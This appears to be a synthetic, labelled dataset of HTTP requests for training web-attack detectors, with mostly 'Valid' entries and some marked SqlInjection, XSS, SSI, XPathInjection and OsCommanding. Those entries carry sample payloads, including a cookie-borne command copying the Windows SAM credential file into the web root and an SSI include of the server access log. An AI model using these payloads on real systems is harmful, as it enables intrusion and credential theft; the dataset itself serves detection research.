Client-ip: 160.200.75.96
Cookie: -selectwRYOacceptB=2tsimaeattuoenaaCr;hosthl=5stdinwlosee;ucmdHIWYeV=4;t8zbottuit6tk=4043
Cookie2: $Version="212"
Date: Sun, 05 Jul 09 18:09:06 GMT
ETag: W/"32r7hQgjXnRa3zv"
Expect: 100-continue
From: txeT@aevntoegn.com
If-Modified-Since: Fri, 18 Jul 08 08:37:37 UTC
If-Unmodified-Since: Fri, 08 Feb 08 11:29:02 UTC
If-Match: *
If-None-Match: "Q3sOMl@NOeJb4TW"
If-Range: Sat, 17 Jan 09 18:35:44 UTC
Max-Forwards: 18
MIME-Version: 6.1
Pragma: t=olocou
Proxy-Authorization: Basic dDJhMDpJdGxlZWFo
Authorization: Basic TzlOZWpZcjpqZWVvVHQ=
Range: 802086-,4327-
Referer: http://www.eiufr.gov/uwpes/7Ereee/gene.swf
TE: trailers,trailers
Trailer: Pragma
User-Agent: amnsnascuj
UA-CPU: StrongARM
UA-Disp: 2316,870,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 2236x546
Via: 1.6 17.235.42.106, 4.6 www.Noahsst.jpg
Transfer-Encoding: identity
Upgrade: on4No/1.1, ethsR/6.5, yReop/0.2, in9/6.6, japnn/5.3
Warning: 220 www.htxyn.js:56846 "tipspynata3kBht" "Tue, 15 Sep 09 04:06:34 CET"
X-Forwarded-For: 23.226.91.137
X-Serial-Number: 716222532954
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 20756
Start - Id: 17801
class: Valid
GET /7n0g/dA6hmcon/efbtIsjsdr9/trcpnbgsound-Oim3g0W/ynupdateLqRJb1OygppS/AXuJuhtaccesC2UDjcatoEwinnt/9a8eyeooshldhaqUAidi/rasha/JJo254oEH5Rjl0input/qUlej-DaGktA6/4osoalyeton/1r8xmlbody.js?0sihxht=0-h4llyhomeeawi8between&oor7nn=056083134&ttnlyurshhtcLd=hscripta&Oanrkoy=207559&nAsnluaewo6i=o3&qBLR=9rg&aiTte9M2=os&qTds1=cdsvxrergdro&uay=uy2e1enhspS HTTP/1.1
Host: 93.250.8.10
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=0
Client-ip: 185.52.126.32
Cookie: te=fVUFAAg;1qTneiegeqxiNeo=hU1.T;Httic=eeO?stylemspe?aLSkinsertbst;ed=okyipeirto-;A_.PZYnwM=dorjn~mhurtoho;
Cookie2: $Version="6"
Date: Thu, 15 Oct 09 22:17:25 CET
ETag: W/"_vPuMsZzKZ_7lToRk9"
Expect: 100-continue
From: e17rsBri@dasrr.ch
If-Modified-Since: Wed, 06 Jan 10 11:52:06 UTC
If-Unmodified-Since: Mon, 04 Sep 06 08:51:00 CET
If-Match: "TUuyQdYpzwja2f_IgjeK"
If-None-Match: *
If-Range: Fri, 12 Aug 05 09:30:19 CET
Max-Forwards: 562
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM NmVnaWhlaUJpcE5zTmVvb3R1bW4yc2NBcjRlRXFFckVvTmhvbG4=
Authorization: Digest uri=http://lmeghm9.biz/dodsxsIv/ikeh/0tinl/sbsststk.exe
Range: -542,05-69330,03-679
Referer: http://www.lhm4er.st/efc1v/gemt2ie/nsspato/ephTlr.wmn
TE: deflate;q=0.9
Trailer: Pragma
User-Agent: Mozilla/7.6 (Windows; U; Win98 7.0; ec-rn; rv:9.6.3) Gecko/90543866
UA-CPU: StrongARM
UA-Disp: 4032,6122,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 942x1602
Via: 6.0 183.133.38.72, 7.0 www.earsrr0o.gif, 4.2 www.tTrczwta.css:2686
Transfer-Encoding: compress
Upgrade: 2iphci/0.2
Warning: 772 19.4.250.196 "a2huUdChiyr6hamrt" 
X-Forwarded-For: 116.27.197.85
X-Serial-Number: 74706
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 17801
Start - Id: 11703
class: Valid
GET /tqoax/iipxo4tslaAwr/kyd.tiff?3Etm6healhaw=4589&oicAecdz9=jBKHMqevU_z HTTP/1.1
Host: www.eetdaq2gy.net
Connection: keep-alive
Accept: audio/basic, audio/*
Accept-Charset: x-mac-ce, x-mac-hebrew, x-mac-turkish
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-age=2104
Client-ip: 228.241.203.171
Cookie: nhfr=6312;trsSa=tao oeGct shutdownkgINo;dahrinHvjNl=+oo1tamkFseg
Cookie2: $Version="830"
Date: Sun, 06 Sep 09 16:22:23 UTC
ETag: W/"N6u7Y-AycW5pLpPx-6QY"
Expect: 100-continue
From: sirxnDi@0oociO.fr
If-Modified-Since: Thu, 24 Feb 05 06:07:09 UTC
If-Unmodified-Since: Wed, 20 Jun 07 23:37:20 CET
If-Match: ".wAAcK-WcSiiZb3Y"
If-None-Match: *
If-Range: Mon, 13 Sep 04 10:08:13 CET
Max-Forwards: 1
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="ciapc"
Authorization: Digest uri=/habrao/xscc/tceeitn/sePky4lo/ihfn.txt
Range: 194152-,-4
Referer: http://ts3tua.com/Chindo4p/oem2/snr7de/MnridC.fgf
TE: chunked;q=0.2,trailers,chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/1.1 (Machintosh; U; Mac OS X 9.0; ea-nu; rv:0.6.9) Gecko/65004623
UA-CPU: 68000
UA-Disp: 940,7536,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 9315x6291
Via: 6.9 www.glddeeqm.html, 7.9 51.255.213.13
Transfer-Encoding: gzip
Upgrade: tmr/0.7, qae/7.6, nere/3.3, tuievn/5.5
Warning: 637 www.aeeraelm.tiff "lNtm2er4nisiubnubi" "Thu, 24 May 07 04:01:04 GMT"
X-Forwarded-For: 129.43.76.8
X-Serial-Number: 2344723441
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11703
Start - Id: 6842
class: Valid
PUT /QG1a-BazQn0aLjD.jpeg? HTTP/1.1
Content-Length: 30
Content-Language: eLeyta,y,te
Content-Encoding: compress
Content-Location: http://www.cNrobnft.fr/huhAe/tVpnhndo.gif
Content-MD5: cFdldGhDZ2JtdXJvVE9kcw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 04 May 04 17:24:43 UTC
Last-Modified: Wed, 18 Jul 07 05:45:09 UTC
Host: 64.234.147.95:80
Connection: close
Accept: */*
Accept-Charset: euc-cn;q=0.0, iso-8859-2
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 56.166.151.5
Cookie: 20ia=v$;pAyTdmme8=a h g;ae7at0odfrll=t$;CkGLcopyallGhQM1=uyebawoldatr;mncy3t=c2Jr787C;I-binMACNmknEO=ak
Cookie2: $Version="628"
Date: Tue, 12 Sep 06 16:56:56 CET
ETag: W/"qmkQusRfs2p4B8o5H"
Expect: 100-continue
From: dbae4ti@tmraxarsak.gov
If-Modified-Since: Fri, 21 Sep 07 19:30:12 CET
If-Unmodified-Since: Wed, 13 Sep 06 09:32:28 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 75
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic dG9hZm9vcm46aW9yRWJwdXk=
Authorization: Digest realm
Range: 708-,54-
Referer: http://www.eIeK.com/2efui4z/puc5tm/esd0Ee/trieN0ei.ace
TE: trailers
Trailer: Range
User-Agent: 5S@Jtyg http://www.kaah.st
UA-CPU: 68000
UA-Disp: 469,437,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 302x0187
Via: 6.1 www.ets1i.gif:7600, tcr8m/3.2 www.enrr.htm, in2O/8.1 193.50.191.123
Transfer-Encoding: identity
Upgrade: adhoe/1.9, tFp/6.3, Sodh/1.5, htccnv/7.0, Teeeqf/9.6
Warning: 649 203.53.186.124 "goDwmmazMte" "Fri, 23 Sep 05 06:11:33 UTC"
X-Forwarded-For: 38.119.21.192
X-Serial-Number: 99955754
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mrtajodiVstoaGl=hnuvstn4yi39ly

End - Id: 6842
Start - Id: 30106
class: Valid
GET /p4Zdp.jpeg?MkYuSbetweenB=l4enhTLshhos&deTe3htul=6%5D%5B&jlogXrAGwKprocessing-instructionlocation=536684074&8ennep5=ureplace&y3ierw=00702760&dhs=NIroIxnqhuaee7a&OV=%3EvarHe&egtos=8818079&ADE9T_P=gleooxAwtDchtne&yAt7etu=naADe&m5ooksmlTwr=8617&odaRssutno=gkseiEwio5Yssdsqee&odene=ahnwj&ictcoh4terhn=i5e&enejA=91847 HTTP/1.1
Host: www.aiez.uk
Connection: 3ihdyv
Accept: */*
Accept-Charset: iso-8859-2;q=0.4, x-mac-cyrillic;q=0.0, iso-8859-9;q=0.7
Accept-Encoding: compress, deflate, identity;q=0.8, identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 124.9.55.170
Cookie: boakaihowis=sjUuc$$5l;5Dsb5=y9osef2n2zoeuhiso;v9n1L=ajkvaeWnydc\;eSalemEnia0c=t;rMe=2
Cookie2: $Version="7"
Date: Sat, 12 Jun 04 21:23:20 GMT
ETag: "r1jtsqj1MClaap3WG92"
Expect: 100-continue
From: iustaSag@Odyltrr.it
If-Modified-Since: Thu, 31 Dec 09 04:05:24 UTC
If-Unmodified-Since: Sat, 20 Mar 10 05:47:18 GMT
If-Match: "3MZoenLWJtKSQYi05kam"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 1.5
Pragma: 9tat='ti'
Proxy-Authorization: Digest nc=8CECDa42
Authorization: Digest response="D4AD32FBCb4Cb73A8864dA0a84f45DA6"
Range: -3400,603295-
Referer: http://www.eOwtR.st/rgocCsy0.cfm
TE: chunked,chunked;q=0.3
Trailer: Date
User-Agent: Mozilla/1.1 (compatible; rjardurde; Solaris; w7cc)
UA-CPU: MIPS
UA-Disp: 978,2584,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 118x9358
Via: fesaqe/0.0 www.rptRfn.js, 6.3 196.31.148.48, 3a2/1.4 187.209.23.101
Transfer-Encoding: compress
Upgrade: AajeA/4.4
Warning: 166 93.46.119.175 "apeeou6Udinzauet" "Thu, 11 Dec 08 02:46:24 UTC"
X-Forwarded-For: 110.208.121.15
X-Serial-Number: 131299472861769232
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30106
Start - Id: 3941
class: Valid
PUT /OgiWlInnHcesais/vsaesaytbbu6d/rG@r7OQg.EF0b65Gw.jsp? HTTP/1.0
Content-Length: 86
Content-Language: aiB1jtL
Content-Encoding: deflate
Content-Location: /jtowt/tpobeh5o/ohneob.cgi
Content-MD5: cmhlcnJvY2NocmR6bjFicg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 28 Feb 08 20:37:03 CET
Last-Modified: Mon, 07 Jan 08 12:17:41 GMT
Host: 103.76.90.183
Connection: 7h4fy4a6
Accept: video/*
Accept-Charset: euc-kr;q=0.3, isiri-3342;q=0.0, hz-gb-2312;q=0.3, iso-8859-8-i;q=0.9, iso-8859-1;q=0.3
Accept-Encoding: gzip;q=0.8, deflate;q=0.1, deflate;q=0.7, compress
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 130.216.226.250
Cookie: be=znUFUYN8gg;Ynynn=9028
Cookie2: $Version="86"
Date: Sat, 23 Oct 04 23:12:50 UTC
ETag: "O.iD-cgfM.3ILEWOek"
Expect: 100-continue
From: piNm@lsgw.org
If-Modified-Since: Thu, 03 May 07 21:57:31 UTC
If-Unmodified-Since: Thu, 25 May 06 03:01:36 GMT
If-Match: *
If-None-Match: *
If-Range: "8S-bwi177JJ_OQXqdv"
Max-Forwards: 6
MIME-Version: 4.0
Pragma: sn='9tida'
Proxy-Authorization: Basic cmlzaGhoaTo1ZWt3d2VhZA==
Authorization: htitlH mohn1=essidwv
Range: 2452-267,089-
Referer: /nwqploo/sDrpx.jpg
TE: trailers,trailers,gzip;q=0.0
Trailer: If-Match
User-Agent: eeos3e
UA-CPU: Sparc
UA-Disp: 905,734,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8863x893
Via: 2.5 www.Rtdav.html, FTP/0.7 www.g5emo.js, 2.4 www.wuMndoo.tiff:8
Transfer-Encoding: Ppgst
Upgrade: nake/5.5
Warning: 919 www.mtalttl.jpeg "yoDe2ilnvoktppsupn" 
X-Forwarded-For: 152.216.247.81
X-Serial-Number: 43070920922344892051
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

exctsArsiL2=dr2esssshoen1c&Rnre=484&bpum=405966&nzGtioss2estie5=r3&slcIiica3atpuo=0152

End - Id: 3941
Start - Id: 1306
class: Valid
GET /uitos/mi1kecd@P8O@-/4hhshnpjssLl129iiuMh/i7Ic2W6NOYY80ko/sChcSvetemssNttu/uO-.html?eRdcotrcrn=qDZ_0&3noa=%2Feege%2Bs%3Binsertow6ajun%28%3A&yd7oiiljr9uo=%40aG%24%7Eozol%3Drutoa+m+Ha HTTP/1.1
Host: 40.74.248.113
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 213.178.76.185
Cookie: 2inEaKoTUnd0ru=5;Boeiad3Uati=iFPZA;LubGF1EyRkk=1s;Ailhuohfvip=efoXaM92Djae1fmetn
Cookie2: $Version="8"
Date: Fri, 05 Jun 09 12:12:03 UTC
ETag: W/"r3JRCi64yWn0jqV4kC"
Expect: 100-continue
From: strldbE@9qmhittm.gov
If-Modified-Since: Mon, 03 Mar 08 16:38:09 UTC
If-Unmodified-Since: Sat, 10 May 08 18:11:02 GMT
If-Match: "JOAb2qorcTbkd8L"
If-None-Match: *
If-Range: *
Max-Forwards: 2889
MIME-Version: 9.4
Pragma: eYehSIi=l
Proxy-Authorization: Basic dE8zb3I6aHNrdGt2Nm8=
Authorization: Digest uri=http://orecee.st/kNEtn/hrya/mTkk7en/tnoskihH.wmn
Range: -988,-63,-146
Referer: /ifapre/rna3ajs/neNnh.html
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/6.5 (Windows; U; WinNT 4.5; tt-so; rv:1.5.8) Gecko/66186172
UA-CPU: Sparc
UA-Disp: 298,657,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7486x696
Via: 0.4 www.oheodhre.jpeg
Transfer-Encoding: NnFeh
Upgrade: mutL/9.2, iiM/7.3, lustl/1.7
Warning: 222 www.adbe.jpg "ebprbkhtcfatduen" "Mon, 20 Mar 06 12:05:20 UTC"
X-Forwarded-For: 47.248.188.232
X-Serial-Number: 67843918306515180
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1306
Start - Id: 42222
class: SqlInjection
GET /hstdArxowebe5pie/lea/is-Ruprocessing-instructionWTswzzEU/iDr/05ucr5DDIpl.UoS9ILHe.jpeg?DformJT=%27++%2F**%2F+OR+++++%2F**%2F+%273u8%27+%3E+++++%27S&gsns5Apschep=eiearnss&0ds=oHnsnadh&aoaLnabR8jRr8t=8340852991&uycrsIsedTi=17&etyin5cgnoep2=D4ieiqoodu&i06Ktbysoe6ft=lq74Q7W&xnjewro=+n8rtdprbhwo&pdeoTraxpmitdit=529&MuzRqVN2it=luouryuEle&tftlcseeROtsbw=netcat%40cZ&.t9jmetaimg69=eaXJYugmC49&lcm6uef4fomi=7a&orE@qHbF6Odo=sPb%27ii+t-ecopy%2Fclidn&gQNo7G=8478887 HTTP/1.1
Host: www.oestzAsae.ch
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: iohsta-s5ua2en
Cache-Control: only-if-cached
Client-ip: 113.18.47.101
Cookie: WoCS=e) lwu-0iprw
Cookie2: $Version="35"
Date: Fri, 22 Apr 05 10:07:51 GMT
ETag: W/"tXiGyLYJXuOw39ER0"
Expect: 100-continue
From: 6bttom@2kOpyg.org
If-Modified-Since: Wed, 15 Apr 09 24:11:50 GMT
If-Unmodified-Since: Sat, 08 Aug 09 22:29:58 UTC
If-Match: "NCKukWukmNVxIKFT5p"
If-None-Match: "E@mk8FxwZdsOt_Ws.L6"
If-Range: "nQD8RjO5nsCm4fa88OPP"
Max-Forwards: 036
MIME-Version: 0.3
Pragma: uEttfea='h1nbIhe'
Proxy-Authorization: Basic eXJoZTc6dEVpZXQ=
Authorization: Basic UnRvZG9ubzplbGVvMTV4
Range: 19-17
Referer: http://www.e9gzNna.gov/sidc/yjaf/bb2r2/tdpudnig/iduelW.nsf
TE: trailers
Trailer: If-Range
User-Agent: btaat (t_ZSWQb; yOfNRo6; cUs47E7)
UA-CPU: x86
UA-Disp: 6743,482,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 451x3766
Via: 0.4 www.blend6Ua.html:9
Transfer-Encoding: deflate
Upgrade: s1sE/7.8, ytaat/3.7, hNej/0.0
Warning: 805 www.oCYoru.jpg "crToo" "Wed, 13 Feb 08 17:50:20 GMT"
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 8756384538065662
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42222
Start - Id: 46650
class: XSS
GET /hnPatO/texogv9ugqtit/iHbT8qd--keSgx@/l2tEb1tatYe/RZyJvar1where9@Ur@rrcp/nQUuU8/r2kelyctlaglRrefenlt/58gkhV@jo.@/amhoes/passthruW4obR.pl?0ssa=71&ms=lPJYaOhBoA&kcnrtosiatfoune=6249481&rt=c22vyKkQuo&wjKH=teaKav5N94yW7t HTTP/1.1
Host: www.tl2seb.uk
Connection: keep-alive
Accept: application/x-tar, text/*;q=0.7
Accept-Charset: x-mac-ce;q=0.0, us-ascii
Accept-Encoding: <div  style= "    binding:  url([http://www.alilst.com/script/etsfgv9H.msf]);    "  >
Accept-Language: ieldieO-spw, oYLa-hemeica;q=0.5, ldntn-jaeieih, hec3-8hedh;q=0.9, d1-u;q=0.1
Cache-Control: only-if-cached
Client-ip: 115.198.136.94
Cookie2: $Version="6"
Date: Fri, 15 Sep 06 18:25:01 CET
Expect: gei7wtf
If-Match: "lHSezSEt.gStwiZ"
If-None-Match: *
MIME-Version: 1.9
Authorization: Digest nc=0E81bf4b
Referer: http://www.5syhri.ch/Rseoci/tEtenls/7lpaW9.php
User-Agent: sac8io/4.9
UA-Color: color32
Via: 3.4 213.137.87.147, FTP/7.6 www.r5k7ooh.gif:0, HTTP/7.9 63.61.20.187
Transfer-Encoding: gzip
Upgrade: dsZ4sm/9.0, S3s/4.3, i9u9oA/9.6

null

End - Id: 46650
Start - Id: 39706
class: SSI
GET /ea/z3lmhAm/DzTSYvgOgux.shtml?Httflnoiene=23&soetseasioRjhfn=%3C%21--+++++%23include+++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++--%3E&oejha0ctrhe=openttp&H925vL=zlraOn&snNrcmio0ien=rdtphpsenewt&Ogulhmehat3ao=sa_v_VdHir&hnc9octa5Ft4an=irsox&ne=ie9su5&oihbetqS3=Rfitoisp9%24a+th&abheiai=kan&7swmtX=prtn HTTP/1.1
Host: www.aettnh.cz
Connection: Foehtw
Accept: audio/*, text/html;q=0.8, image/gif;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: behcuoNb-rnokiy;q=0.1, ueOMt-tteob, wcEin-ehoeedA;q=0.3, xbt-tSw;q=0.5
Cache-Control: max-stale
Client-ip: 101.49.34.176
Cookie: Ntct=3810750;sinXFuDnt_Z=SturuMehneean2hee;tionhhu=ssHah]pdmoshtn;3at3Hj0estcser=& 3t;ptuueasipewd3=mochaei9o2sAopen-;tzjwiaFapao0e=01385
Cookie2: $Version="1"
Date: Wed, 29 Jun 05 23:06:13 UTC
ETag: "eQt1lpFUkKACMULNX9"
Expect: bufr=y5wn1
From: en976nr@rtqaia.net
If-Modified-Since: Sat, 13 Dec 08 10:37:28 CET
If-Unmodified-Since: Tue, 17 May 05 22:30:54 GMT
If-Match: "IvKCUr8qbgb3QHm_"
If-None-Match: "l9Mr0wPvZ_z_a2sDr"
If-Range: Fri, 29 Dec 06 21:53:09 UTC
Max-Forwards: 61
MIME-Version: 7.2
Pragma: sb8dt=Rtlcn
Proxy-Authorization: mE1df gdtrmo=oh1esyls
Authorization: NTLM Z2MzdHNVcnU0bzVoc0RlZWlvVXdldmFYSXNscWxtZXJpcnVy
Range: 61-,98874-5,222224-
Referer: http://jibtn3.net/niddoxe/ab1re/lttuTg/qnnt/actovdO.sh
TE: gzip,deflate
Trailer: From
User-Agent: ayyey/0.4.3.3
UA-CPU: Sparc
UA-Disp: 3264,053,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 893x558
Via: 0.7 195.181.183.129:9457, 1.9 175.111.4.64, 5.1 www.eiPrrn.js
Transfer-Encoding: compress
Upgrade: effn/5.2, ajnt/0.1
Warning: 369 149.111.64.199:3 "eoiihioAuntte" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39706
Start - Id: 35728
class: XPathInjection
GET /ak8FMWUni0jmfy8HMwp/u_Gfl2@uy8USQtIo4.I3/peln/ER.jpeg?hug7otemsvji=%2Bt&eEnT=tl9x5qua%27+++++or++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or+++++%27srt%27++++%3D+++%27&sociAoRh=792614&e4yrOcedeoG=9&9aasDn=7&v7B6nR7hd=tA4rcriuoR3&2.sKNm.=tfl7at+iu0a8Ldt&3csotdottn=rdVoi HTTP/1.1
Host: 146.173.115.61
Connection: close
Accept: application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: tmp-somiCi;q=0.4, tn1aNNE-pwteiy
Cache-Control: poeiltrc='ty'
Client-ip: 41.165.190.48
Cookie: rrr1=94796;xhvs-cHI=Jo@hi;ihCmS7SInodeLY=4688481
Cookie2: $Version="001"
Date: Mon, 16 Jun 08 20:48:34 CET
ETag: "u39oPyKWUUBlk8Zb"
Expect: 100-continue
From: nptt@ai166.st
If-Modified-Since: Wed, 03 Nov 04 21:14:08 CET
If-Unmodified-Since: Sat, 26 Jul 08 21:07:57 GMT
If-Match: "o_b_lmCf8w3dYtr"
If-None-Match: "MJH4Cnx74O.7P@z."
If-Range: Fri, 25 Apr 08 12:11:07 CET
Max-Forwards: 3
MIME-Version: 4.7
Pragma: ulW='2ipl'
Proxy-Authorization: NTLM Z3Ntc2hscmZlTk5vc3JpYWVsYWVubGV0SWVhZ25lTXNueDl3c2VOeXN0cGVybnJh
Authorization: Basic cmZsb29jdWU6ckRVNg==
Range: 820401-
Referer: /7itI/dCaes/ihAiq.asp
TE: deflate,chunked
Trailer: TE
User-Agent: aiseasuiI66
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 161x6887
Via: nheut/5.6 www.koiaIej.png, 9.7 www.rs08gan.tiff, 5.5 156.74.254.199
Transfer-Encoding: deflate
Upgrade: odee/0.3, hong/9.6, eeicao/8.3
Warning: 550 www.hfiueaes.shtml "mhtjtnssennQ8" "Fri, 14 Nov 08 07:02:27 UTC"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 126041771570096080
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35728
Start - Id: 42805
class: OsCommanding
GET /aSssShlsdrqh/7LscriptMqj.libwqO6iD/vKsxEz7eJTH-Yg/update-@0gselect4K4ci/a-Jsvs3mcYSaxMj6N@M/@processing-instructionAbodyOQnandAl/uctu2rCoe.js?3usn=qNLjiGqTa&ooiit=t8o3xlpe&wro9nlcawrgiid=1&ptrih=Tn+g+o0dbntwndtlbe&tde=96&Ktj9SnCQ=93646&1vmecv=8101656391&xneTgqe=3796337361&eB=yJS1w8bR&1muHFAgEreplace=hpLtrnlt&5ruu9euh=2590047074&raA=7608 HTTP/1.1
Host: 103.177.221.138:80
Connection: close
Accept: text/xml
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.0
Cache-Control: to='EnNnltJ'
Cookie: 5falhbicdoou7=/eo3ioraneynce;30RFxtermoyT=214.55.227.78    |   copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\sam.ddd;areihlsp=69274;Om50thooe=c2iV;oz66feo0aex=yFZd
Cookie2: $Version="216"
Date: Thu, 06 Apr 06 23:31:57 UTC
If-Modified-Since: Thu, 25 Mar 10 13:33:55 CET
If-Unmodified-Since: Mon, 17 Mar 08 14:40:56 UTC
If-Match: *
If-None-Match: *
If-Range: "jpdqh8pHP8ftBjx9"
Max-Forwards: 5205
MIME-Version: 9.9
Authorization: NTLM dGxlYVQ0c3NsZmVuYWVpVDE0eG5zdHRvaWl5aXlvZWF3MWdBZWEydzA=
Referer: http://5atlrhz.ch/oifetfss/ltn6nr/aeuyPi/srTa1/frmttteg.tiff
Trailer: User-Agent
User-Agent: Mozilla/7.2 (Machintosh; U; PPC 3.4; Ah-ts; rv:4.9.6) Gecko/10617729

null

End - Id: 42805
Start - Id: 19444
class: Valid
GET /inl4it/fjQ.@4Iandr/eibtV/p3GW/winnt4@pYU@/iwahdoiastaeeDxesem/esnEe5thr8utite3rttz.asp?er8shroin=eb3IdtEgsrehi&i8op=nIyQ&Inodeo.GiframenctG=ugllibl+lod&nb7ioe8=216058&6geunhaxael=ia&ntiTdfnaRute=home5-%29u+%28ow9Hrrdr HTTP/1.1
Host: www.rjLmhz.uk
Connection: close
Accept: */*;q=0.6
Accept-Charset: iso-2022-kr;q=0.5, iso-2022-kr;q=0.6, windows-1250, x-mac-turkish;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: max-age=228
Client-ip: 168.104.135.23
Cookie: sajodhcrrfsy=8hvhe7l
Cookie2: $Version="7"
Date: Wed, 05 Aug 09 08:26:42 GMT
ETag: W/"XOUTb51DsgF6vw2B"
Expect: ii4Il=cr9ndt;ddle7
From: rshehat@qllhSResb.de
If-Modified-Since: Sat, 12 Aug 06 08:54:38 UTC
If-Unmodified-Since: Mon, 31 May 04 15:27:21 CET
If-Match: "yXuveZ5hnbWcG5g1pr"
If-None-Match: *
If-Range: Thu, 15 Jan 04 18:16:06 UTC
Max-Forwards: 7
MIME-Version: 8.7
Pragma: htxt7en='s7o'
Proxy-Authorization: NTLM ZGlhaUwyaG50aWxUczdoOWVsdGFmaGpmdGFvb2xiUzlaYWR0dE9sOXR0
Authorization: teomr bsaanR=rnIroe
Range: -2,6-20086
Referer: /ihgeeeo/lvs8w6y/8mlxu.swf
TE: trailers
Trailer: Max-Forwards
User-Agent: yXvJCTYz http://www.etaeif.de
UA-CPU: x86
UA-Disp: 915,682,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6480x436
Via: 3.0 www.Eoes.shtml
Transfer-Encoding: deflate
Upgrade: 3tDr/0.3, octa/6.4
Warning: 889 www.tpb2d.html "1p2mfhiat" 
X-Forwarded-For: 83.131.31.88
X-Serial-Number: 31641026520148
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19444
Start - Id: 25104
class: Valid
GET /oGD6t9DTSIKi/rOryfisiI0nigoe8/18RZ3FTohtX/utpNa.htm?omsuquEge=ZStmpnu%27dadee&athunero=cLkg&hiEh=lGBhTaAV&Nhon=ejcG2b-4Zb-7 HTTP/1.1
Host: www.otexd.uk:70287
Connection: close
Accept: image/jpeg, application/*
Accept-Charset: x-mac-arabic, windows-1250;q=0.7
Accept-Encoding: 
Accept-Language: Tvia-V;q=0.5, eosesnr-esvg, hoe-7;q=0.1
Cache-Control: only-if-cached
Client-ip: 57.194.145.165
Cookie: C_O1ArAX9J=TtseoohdEltmrnbad;nnhwc=b
Cookie2: $Version="80"
Date: Mon, 23 Jun 08 20:27:15 GMT
ETag: W/"mqQR6ynwj3E7ZmWp"
Expect: ue2m
From: hixb@siilehs.org
If-Modified-Since: Thu, 20 Jul 06 12:08:42 GMT
If-Unmodified-Since: Sat, 21 Mar 09 02:52:07 GMT
If-Match: "Tz-4.mUb6kKGOLw1.A8F"
If-None-Match: "t6q-xFXL1zF5XkW@18dx"
If-Range: "ABJmIA384KJays8"
Max-Forwards: 8117
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Basic aWdycTA6YXRpYWFpbw==
Authorization: Basic YWFvOXVTbnM6Zml0b2Vl
Range: 418-75506
Referer: /zhaoea/cezls/n3s0bd/saarn/nttW.php4
TE: deflate,trailers
Trailer: Expect
User-Agent: Mozilla/2.2 (Windows; U; Windows NT 0.5; l5-h5; rv:7.8.7) Gecko/85153027
UA-CPU: PowerPC
UA-Disp: 9555,789,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 350x680
Via: 5.2 9.164.91.32, FTP/6.3 www.AoinnDa.shtml
Transfer-Encoding: identity
Upgrade: yg2S1h/0.5, 6io/2.3, dsn/3.4
Warning: 317 140.218.52.117:92561 "mh5erupnothHa4i6ik" 
X-Forwarded-For: 64.157.250.51
X-Serial-Number: 714579
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25104
Start - Id: 46316
class: PathTransversal
